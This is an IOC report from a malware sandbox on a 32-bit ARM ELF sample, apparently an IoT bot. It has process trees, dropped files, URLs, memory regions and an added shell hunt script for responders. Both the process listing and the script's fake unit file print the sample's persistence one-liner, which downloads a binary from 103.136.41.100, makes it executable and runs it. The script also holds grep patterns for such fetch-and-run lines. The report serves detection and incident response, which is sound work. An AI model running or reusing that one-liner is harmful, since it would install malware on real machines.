IOC Report
5.elf


Files

File Path | Type | Category | Malicious
5.elf | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | initial sample | malicious
/tmp/5 | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped | dropped | malicious
/etc/systemd/system/hello.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |

Processes

Process tree (child processes are indented under the process that spawned them; each entry is Path | Cmdline; the Malicious column was empty for every row)

/tmp/5.elf | /tmp/5.elf
    /bin/sh | sh -c "systemctl daemon-reload > /dev/null 2>&1"
        /usr/bin/systemctl | systemctl daemon-reload
    /bin/sh | sh -c "systemctl start hello.service > /dev/null 2>&1"
        /usr/bin/systemctl | systemctl start hello.service
/usr/bin/xfce4-panel
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
    /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
/usr/lib/systemd/systemd
    /usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator
    /bin/bash | /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
        /usr/bin/sleep | sleep 10
        /usr/bin/rm | rm -rf /tmp/5
        /usr/bin/wget | wget http://103.136.41.100/5 -O /tmp/5
        /usr/bin/chmod | chmod 777 /tmp/5
        /tmp/5 | /tmp/5 .p1

Read together with the Files table, the tree shows the persistence mechanism: the sample writes /etc/systemd/system/hello.service, reloads systemd and starts the unit; systemd then spawns a bash one-liner (consistent with it being the unit's ExecStart) that waits ten seconds, deletes any existing /tmp/5, re-downloads it from http://103.136.41.100/5, makes it world-executable with chmod 777 and runs it with the argument .p1. The xfce4-panel children are the analysis host's desktop session, not activity of the sample.
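The drop-and-persist chain above leaves four artefacts a responder can check for on a host: a unit file whose Exec* line downloads into /tmp and executes, the dropped paths /tmp/5 and /etc/systemd/system/hello.service, a process whose argv is /tmp/5 .p1, and a connection to 103.136.41.100. The hunt script below is an added example, not part of this report or of the sample. Its sample input (a fake root directory, a ps listing and an ss listing) is constructed here, and it assumes hello.service's ExecStart is the bash one-liner that systemd spawned, since the unit's body itself is not in the report.

```shell
#!/bin/sh
# Added hunt script for the IOCs in this report (not part of the report or the sample).
# unit_hits, dropped_hits, argv_hits and net_hits each take a path argument so they can be
# run against a live host or, as in the demo at the bottom, against a constructed fake root.

# unit_hits DIR: print each *.service in DIR whose Exec* line fetches a URL and
# touches /tmp, /dev/shm or chmod 777 (the pattern of the report's bash one-liner)
unit_hits() {
    for unit in "$1"/*.service; do
        [ -f "$unit" ] || continue
        if grep -E '^Exec(Start|StartPre|StartPost|Reload|Stop)=' "$unit" \
            | grep -E '(wget|curl)[^;]*https?://' \
            | grep -Eq '(/tmp/|/dev/shm/|chmod 777)'; then
            printf '%s\n' "$unit"
        fi
    done
}

# dropped_hits ROOT: print the report's dropped-file paths that exist under ROOT ("" = live host)
dropped_hits() {
    for p in /tmp/5 /etc/systemd/system/hello.service; do
        [ -e "$1$p" ] && printf '%s\n' "$1$p"
    done
    return 0
}

# argv_hits FILE: FILE is "ps -eo pid,args" output ("-" for stdin); print PIDs whose
# executable is /tmp/5 or whose last argument is the sample's ".p1" switch
argv_hits() {
    awk 'NR > 1 && ($2 == "/tmp/5" || $NF == ".p1") { print $1 }' "$1"
}

# net_hits FILE: FILE is "ss -ntp" output ("-" for stdin); print sockets to the download host
net_hits() {
    grep -F '103.136.41.100' "$1" || true
}

# make_samples: build a constructed fake root in a temp dir and print its path.
# The hello.service body is an assumption: ExecStart copied from the cmdline systemd spawned.
make_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/systemd/system" "$d/tmp"
    cat > "$d/etc/systemd/system/cups.service" <<'EOF'
[Unit]
Description=CUPS Scheduler
[Service]
ExecStart=/usr/sbin/cupsd -l
EOF
    cat > "$d/etc/systemd/system/hello.service" <<'EOF'
[Unit]
Description=hello
[Service]
ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
[Install]
WantedBy=multi-user.target
EOF
    : > "$d/tmp/5"
    cat > "$d/ps.txt" <<'EOF'
    PID COMMAND
      1 /sbin/init
   1234 /bin/bash -c sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;
   1240 /tmp/5 .p1
EOF
    cat > "$d/ss.txt" <<'EOF'
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0      0      10.0.2.15:43122    103.136.41.100:80 users:(("wget",pid=1238,fd=3))
ESTAB 0      0      10.0.2.15:51004    162.213.35.25:443 users:(("whoopsie",pid=900,fd=9))
EOF
    printf '%s\n' "$d"
}

# Demo on the constructed root. On a live host run instead:
#   unit_hits /etc/systemd/system; dropped_hits ""; ps -eo pid,args | argv_hits -; ss -ntp | net_hits -
root=$(make_samples)
echo "units:";   unit_hits "$root/etc/systemd/system"
echo "dropped:"; dropped_hits "$root"
echo "argv:";    argv_hits "$root/ps.txt"
echo "net:";     net_hits "$root/ss.txt"
rm -rf "$root"
```

The unit check deliberately requires both a download and a /tmp or chmod 777 indicator on the same Exec* line, so ordinary units that fetch updates over HTTP do not trigger; widen it to /usr/lib/systemd/system and user units under ~/.config/systemd/user when hunting beyond this sample.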

URLs

Name | IP | Malicious
http://%d.%d.%d.%d/%s | unknown |
http://1/wget.sh | unknown |
http://103.136.41.100/5 | 103.136.41.100 |
http://schemas.xmlsoap.org/soap/encoding/ | unknown |
http://9/curl.sh | unknown |
http://%d.%d.%d.%d/2; | unknown |
http://schemas.xmlsoap.org/soap/envelope/ | unknown |

Only http://103.136.41.100/5 was actually fetched (see the wget cmdline under Processes). The entries containing %d and %s are printf-style templates embedded in the sample rather than literal URLs, and the two schemas.xmlsoap.org entries are SOAP 1.1 XML namespace identifiers, so none of these resolve to a contacted host.

Domains

Name | IP | Malicious
daisy.ubuntu.com | 162.213.35.25 |

daisy.ubuntu.com is Ubuntu's crash-report submission host (whoopsie/apport), so this lookup is analysis-environment noise rather than sample traffic.

IPs

IP | Domain | Country | Malicious
103.136.41.100 | unknown | India |

Memdumps

The Regiontype and Malicious columns were empty for every entry, so only Base Address and Protect are listed. The sample is a 32-bit ARM executable while the analysis host is x86_64 (see the xfce4 panel paths under Processes), and every base address here is a 64-bit user-space address, so these are mappings of processes on the analysis host, not addresses inside the sample's own 32-bit address space. Two regions (55d3985cc000 and 5579a320f000) are mapped execute, read and write at once; RWX mappings are where an in-memory payload would be unpacked and are the first candidates to dump.

Base Address | Protect
7f3acc749000 | page read and write
7ffee2923000 | page execute read
55d3985cc000 | page execute and read and write
7fa655e9f000 | page read and write
7f39c402d000 | page execute read
5579a1208000 | page read and write
7ffc8cdd7000 | page read and write
5579a320f000 | page execute and read and write
7fa655fec000 | page read and write
7fa6556e2000 | page read and write
7f3acbeaf000 | page read and write
5579a1211000 | page read and write
7f3acd087000 | page read and write
55d3965ce000 | page read and write
5579a0fb7000 | page execute read
7fa55003a000 | page read and write
7f3acc6b7000 | page read and write
55d3965c5000 | page read and write
7fa550036000 | page read and write
7f3acd268000 | page read and write
7fa6552ee000 | page read and write
7fa64ffff000 | page read and write
5579a3226000 | page read and write
7fa655cbe000 | page read and write
7f3accd16000 | page read and write
7f3accea5000 | page read and write
7f39c4036000 | page read and write
7fa655380000 | page read and write
7f3accd39000 | page read and write
7f3ac4021000 | page read and write
7f3ac3fff000 | page read and write
7fa654ae6000 | page read and write
7f3accaab000 | page read and write
7fa55002d000 | page execute read
55d3985e3000 | page read and write
7fa655970000 | page read and write
7fa656031000 | page read and write
7ffee2860000 | page read and write
5579a3e40000 | page read and write
7fa65594d000 | page read and write
55d396374000 | page execute read
7f3acd3fa000 | page read and write
7fa650021000 | page read and write
7fa655adc000 | page read and write
7ffc8cddb000 | page execute read
7f3acd391000 | page read and write
7f39c403a000 | page read and write
7fa655fc8000 | page read and write
7f3acd3b5000 | page read and write